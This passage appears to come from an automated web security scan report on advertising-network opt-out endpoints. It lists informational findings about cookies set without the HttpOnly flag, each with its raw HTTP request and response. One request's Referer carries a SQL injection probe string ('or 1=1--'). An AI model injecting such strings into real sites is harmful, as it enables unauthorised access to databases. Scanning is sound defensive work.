Pragma: no-cache
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=deleted; expires=Fri, 17-Sep-2010 16:48:25 GMT; path=/; domain=.33across.com
Set-Cookie: 33x_nc=33Across+Optout; expires=Tue, 14-Sep-2021 16:48:26 GMT; path=/; domain=.33across.com
Location: http://optout.33across.com/api/?action=verify
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8

13.127. http://optout.adlegend.com/nai/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /nai/optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout.php?action=setcookie HTTP/1.1
Host: optout.adlegend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:21:41 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sun, 24 Oct 2010 01:00:00 GMT
Set-Cookie: ID=OPT_OUT; expires=Thu, 15-Sep-2016 17:21:41 GMT; path=/; domain=.adlegend.com
Set-Cookie: PrefID=deleted; expires=Fri, 17-Sep-2010 17:21:40 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=deleted; expires=Fri, 17-Sep-2010 17:21:40 GMT; path=/; domain=.adlegend.com
Location: /nai/optout.php?action=readcookie
Content-Length: 0
Content-Type: text/html

13.128. http://optout.crwdcntrl.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:19 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:26 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

13.129. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/dclk/optoutnai.pl HTTP/1.1
Host: optout.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Redirect
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html
Location: http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out
Server: Microsoft-IIS/6.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR FIN INT DEM STA POL HEA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: id=OPT_OUT; domain=.doubleclick.net; path=/; expires=Wednesday, 09-Nov-2030 23:59:00 GMT
Date: Sat, 17 Sep 2011 17:16:06 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&amp;state=opt_out">here</a
...[SNIP]...
13.130. http://optout.imiclk.com/cgi/optout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.imiclk.com
Path:   /cgi/optout.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/optout.cgi?nai=1&nocache=0.9994165 HTTP/1.1
Host: optout.imiclk.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: CH=34695,00000,37118,00000,30330,00000,30298,00000,31482,5dinB,31479,5dinB,33114,00000,22242,5ce2y,32619,00000,31015,00000,32008,00000,32620,00000,30299,00000,28363,5ce2y,36978,00000,30300,00000,32009,00000,37332,00000,32680,00000,30301,00000; YU=357c8d18b23bafe236733d2722dbee8d-5dinB

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://optout.imiclk.com/cgi/nai_status.cgi?oo=1&rand=1316279667
Date: Sat, 17 Sep 2011 17:14:27 GMT
Connection: close
Set-Cookie: OL8U=0; expires=Tue, 14-Sep-2021 17:14:27 GMT; path=/; domain=imiclk.com
Set-Cookie: IMI=OPT_OUT; expires=Tue, 14-Sep-2021 17:14:27 GMT; path=/; domain=imiclk.com
Set-Cookie: YU=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=imiclk.com
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

13.131. http://optout.mookie1.decdna.net/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decdna.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:22:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:22:18 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:22:18 GMT; path=/; domain=.decdna.net
Set-Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:22:19 GMT; path=/; domain=.decdna.net
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.132. http://optout.mookie1.decideinteractive.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decideinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:19:53 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:19:53 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:19:54 GMT; path=/; domain=.decideinteractive.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.133. http://optout.mookie1.dtfssearch.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.dtfssearch.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.dtfssearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:24:22 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:24:22 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: %2edtfssearch%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:24:23 GMT; path=/; domain=.dtfssearch.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.134. http://optout.mookie1.pm14.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.pm14.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:23:30 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:23:30 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:23:31 GMT; path=/; domain=.pm14.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.135. http://optout.mxptint.net/naioptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naioptout.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /naioptout.ashx?nocache=0.8819219 HTTP/1.1
Host: optout.mxptint.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
P3P: CP="NON CUR ADM DEVo PSAo PSDo OUR IND UNI COM NAV DEM STA PRE"
Location: /naicheck.ashx
Set-Cookie: mxpim=optout; domain=mxptint.net; expires=Sun, 17-Sep-2017 17:18:53 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fnaicheck.ashx">here</a>.</h2>
</body></html>
13.136. http://optout.xgraph.net/optout.gif.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.xgraph.net
Path:   /optout.gif.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.gif.jsp?nocache=0.4078982 HTTP/1.1
Host: optout.xgraph.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: _xgcid=598C6089B3DEF3DCD49A516512C9766C; _xguid=21E6599AD7B52492A42B9D3863403A5C

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:21:03 GMT
Location: http://optout.xgraph.net/optout.gif.jsp?check=1
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"
Server: nginx/1.0.4
Set-Cookie: XG_OPT_OUT=OPTOUT; Domain=.xgraph.net; Expires=Sat, 10-Sep-2039 17:21:03 GMT; Path=/
Content-Length: 0
Connection: keep-alive

13.137. http://optout.yieldoptimizer.com/optout/ns  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.yieldoptimizer.com
Path:   /optout/ns

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/ns?nocache=0.5018076 HTTP/1.1
Host: optout.yieldoptimizer.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: om_optout=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 17:37:20 GMT
Set-Cookie: opinmind_persist=488444680.36895.0000; path=/

13.138. http://p.brilig.com/contact/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/optout?nocache=0.4613048 HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:16:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: BriligContact=OPT_OUT; Domain=.brilig.com; Expires=Mon, 09-Sep-2041 17:16:50 GMT
Set-Cookie: bbid=""; Domain=.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: bbid=""; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: BriligContact=OPT_OUT; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 17:16:50 GMT
Location: http://p.brilig.com/contact/isoptout?type=optout
X-Brilig-D: D=753
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

13.139. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?optout=$nai_optout$&nocache=0.8605592 HTTP/1.1
Host: pbid.pro-market.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: anSt=0+4+_f&:8Thd.x&/6x0PP}Nw5E&VGIF^Q_E#%$'>@N!U]l.LzfESl=h:{GMIV8m\!!Iu%\1+x\$v\NS^9wwai|!?[D/ga1/8Ku5D$(=DyON%`14l-/?/`+I49`rEp=[$H2&$9vJz\!!Iu&\1+x\$v\jT2beH|oV~T<n4#E)_`zjW4wf*Qvx=eu!T<iaR@{Sq/yP&nYQ%J8`bOr))FB\!!7>g\2N$\$K\EZu'W~9Jr162wg:MyYeDw6H=`m&L`^PS@:^Azn!I61/ytF(`LCA!ZB0}3S5\!!LH]\2N$\$K\z5%vEThH>_B=#7tJy5e"N%U)(O~aq/'tziEX.Em|J0q=!o.tNsexTp@[J<T\!!7>g\2N$\$K; anTHS=42%7C1312579892800%23; anTD4=07Qtd0IkGsnEjYKpb9dzbv+8odIJmRs74nCMurZsZne72ptFFvRsv4SPZznTs%7C_300201%7C111778%7C1316295502431%7C8%2C14%2C18%2C42%2C5; anHistory=2vzuu3+2+!%11d$j#Q(515#$Y#N/F1Y9$K#KKk; anProfile=2vzuu3+0+s0=(77)+h=bc+1m=1+rv=(-8)+rt='32177B6A'+rs=c+1f=d+4=2lx; AxData=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp4.ny
Set-Cookie: anProfile=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anHistory=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCSC=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCnv=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anSt=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTRD=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTHS=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTD4=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: optout=0+0+0; Domain=.pro-market.net; Expires=Mon, 09-Sep-2041 16:48:17 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Location: http://pbid.pro-market.net/engine?optout=$nai_verify$
Content-Type: text/html
Content-Length: 0
Date: Sat, 17 Sep 2011 16:48:17 GMT
Connection: close

13.140. http://pix04.revsci.net/F09828/a4/0/0/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_I09839=e98f30f2b8e2390e&I09839&0&4e999932&0&&4e740fed&239be0b9fdae6d2fbd805afcd850cfc7; rsiPus_s-1i="MLsX8FUNJi5nYDzKoFXYD5Xit87XeFMuxqfJJEjoH3Asb2Rl2kU6QiFSJzLFQZ4wWCp9eiUz+kCaIWJyWumpxVE3Ky7nxDyQfHtpE9D/ufUIfbyOG+UzR0hwySYCIMtT5i4HHb812uDswuCEg9I3aJXSp5VnT4MRhNG2lgqsO0eTJlTA+4Kdax3CU/VpVvxGagQdu16H1rdfI2okfyYamGF9gmmfcB2WKuP0T5I2QD+KWm69zp+07xvfArOi2Ue0uR2xalrFug6uy/q2EZSJ6APAwt3CLA+dxqPlaecialiPEOh1L55Qc0xwKAezf6+C3LuHLDN8Mt5bdknkprOVhkT26fDw1X5IMQpC/yyvNZkofE3w6gomw+JONvXHgJQtL7O6/NVgInSpPwwmTuIjHE1FilDtnVhW0IHEs/6Cjp1U3BaXoqGpCMvtpYXc6GrxksQw/ueSnxKMMVDYJjhMxxA6qeHlV//ihVc0859zw1pcGEievEw7REJFzvpkadPBqteUtgZ6wBbewqZ6Pge9Ht3pHHiK1/6f28NHjjrP3vjEwa+p1zKJGFJ6xzs="; rsi_us_1000000="pUMd4y+nMBYU7dTLYT75CtswkWJJZC1BifocPlLTwPiW7DQrHOgd62ZTc0hTOCFFtbp5Dasfi0v9zHAmV/H+6y9udDO9F3+RrR+iRkENJVMK27CLPP4fHfi3umeQphrfu3FTtaKpIgHriVu3RrESpb8kNt5dkLnaboDkhXHRwqwtfiT7qOSgUILdk09I6dcW1vOgSGMCtGgEkBM9FK3LWyOHvsqiw8AaK7V5zKiikAdaZV57WErynrBKps8Mau5Uaq2HBNx04J0PFmch96LWNgMNmX6MUXF8wjkqwd9j6iV/jhMzAN70b9vkPJZyUw7A9N0tRh68YBWiVobaDjXGDG2Y7Z+XKNTPBcShluzVjJtRUnOCdxLdVxoy8Y2YLiUQca3yzDaBoHke7EW/6uL6/lYUiYbH+KKdHvI0vGzMy6MO8t/Zx+hEFO6iwXLVkwZe8uhXqp1DZvjWxRnsuvAnZ2SvE9xIAGhu2O7nBAuzTB5b9iVKPDEW+8oTG0NndlSZ3fDku9z3eiG7gnp9d0B84rOlWEBLOtV4nOFoCK+IePsGbDU3O6pRAhFgLkZkyvQjViq4eOyR3leHsdVIc8HU/A7GYPwMRI7uNi/wPpc1B/zBnQY9YhzXhIgO7fN4BbuX593brrwu4vOTXVTB6kjtJrs3FiFMrp2M/y4sZ/2pkZs2oH7TtWPgShREi4ab8n3IOBC9FvrPvqu32C/1vUeOAkHQjRFNFoRtrGusjwZuF2tMz4UpthXcUs2CNCemyMjgU4mnycT5qW2l1fEeF6V3k1XhCPZbObHefs44yUAMUw4KNLMO0sfiJH/oYaIKR/rKHA+tvGNxG9YpiTftWnMiZjuDHgdmjFaismU6LSNz+LEuwDzWaT+844WqD9B3AiMtk7ggwCT/RqWRQs04C/X7nixI6vX4t6Xt8WkrH0Zz9NV2C6TI287z6dPDQ1+u3axu1YLfQHvckVqPdelQTKtqzBvI6Xssfb/7viF6Rl/E6ThP57DKGJxSNmoNd+YfiMUTYCaaHQVgLIrT8yl7ILpkVQbdK9y9VtfzuZwRicoXCPES0SrKqd3DeH+QCE3Ixk80rRMEdzACg1kRyIrBnmLytknaZk7q2Jwweh/JW4FjBJKXf51IXJFH1kDrsAWDdJ6UmZbUh6SNycMq8QZUJK9ZjsbybFDTT9Ics5+Q"; rsi_segs_1000000="pUPFJkmBrwIMl594t637EICbRK4QHREL5G4UoYRo7896qYeIB48s9uNg2v9kDss6IrPb32QuIL+bIwarfPSfqUd5S4nO4rEaCMB3c5cqvtmVJTD7RS1izwssR0oib1pPBbx1qGbV7a0FZa/ttw8nvD4MjXuMpeaX5OgYwfXJ5h5WWtu8iosDYqNDlzAJYwVFsh9yKraBHw53DUaGtDFpSKWMXipYi6X4Dhsa0gjyxXSSUoLnasthgWId2lZkqaFBC7TKe+mgdB7yCLSUZxG5kVU+srUbRr/ZR2fZ3q8CQ7iAxc6+MMicoleEnuwaxL7qT2WChl/DSipIkOEQCUhn+x8="; NETSEGS_F10931=e98f30f2b8e2390e&F10931&0&4e99b65c&0&&4e73f9df&239be0b9fdae6d2fbd805afcd850cfc7; 